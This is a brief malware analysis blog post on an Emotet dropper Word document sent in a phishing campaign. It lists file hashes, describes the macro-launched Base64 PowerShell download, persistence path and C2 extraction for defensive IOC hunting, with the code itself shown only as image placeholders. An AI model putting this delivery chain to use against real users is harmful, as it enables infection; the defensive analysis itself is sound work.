Malware Analysis: Rech-49415128555.doc (Emotet)

August 21st quite a few people across organizations got this document in what looks like a large Phishing campaign. I wanted to understand what this malware does as this had very low detection on VirusTotal. Here is my effort to understand the malware and to record indicators for further hunting and investigation.

Step 1:

Identifying the malicious document

MD5: 2f8222f053940fcf6436759762967f45
SHA-1: bcd6f936d1195c265dab3b559a132e08f7a7052f

VirusTotal Link


Looks like some kind of dropper. It was interesting that VT first saw this file in 2010 and the first submission in August 21st. Where was it hiding for 7 years?

Step 2:

Detonating the malware

I run a couple of custom (Windows 7 & Windows 10) sandboxes with Sysmon from Sysinternals. All web traffic is intercepted with an intercepting web proxy. The network traffic is analyzed and all metadata is extracted and stored.

What did I learn? (End users are the weakest link)

The first thing the document does is it tricks the user into thinking that the document is actually locked / protected.


Enabling Macro executes Powershell

stage 1.JPG

This seems to download a binary with MD5 = C2FCFB112BB4824FC542D7AB8DFDB627. Searching on VT i realized this is Emotet malware. Not surprising this has over 50% detection rate.


Once this executes, it sets up persistence and moves itself from %TEMP% to %USERPROFILE%\AppData\Local\Microsoft\Windows\shedulesystem.exe

C2 IP: (Digital Ocean)




Now that I know this is Emotet I didnt want to waste too much time on this but I wanted to ensure I get all the IOCs out. Decoding the Base64 encoded PowerShell command gives me this:

decoded ps.JPG

Slightly modifying the code and printing the "URL" instead of Invoking it gave me all 5 domains:

stage domains.JPG

Step 3:

Back to basics


Take all the IOCs and make a use case for SIEM / SOC. #DFIR FTW! I hope you enjoy reading this as much as I enjoyed doing this.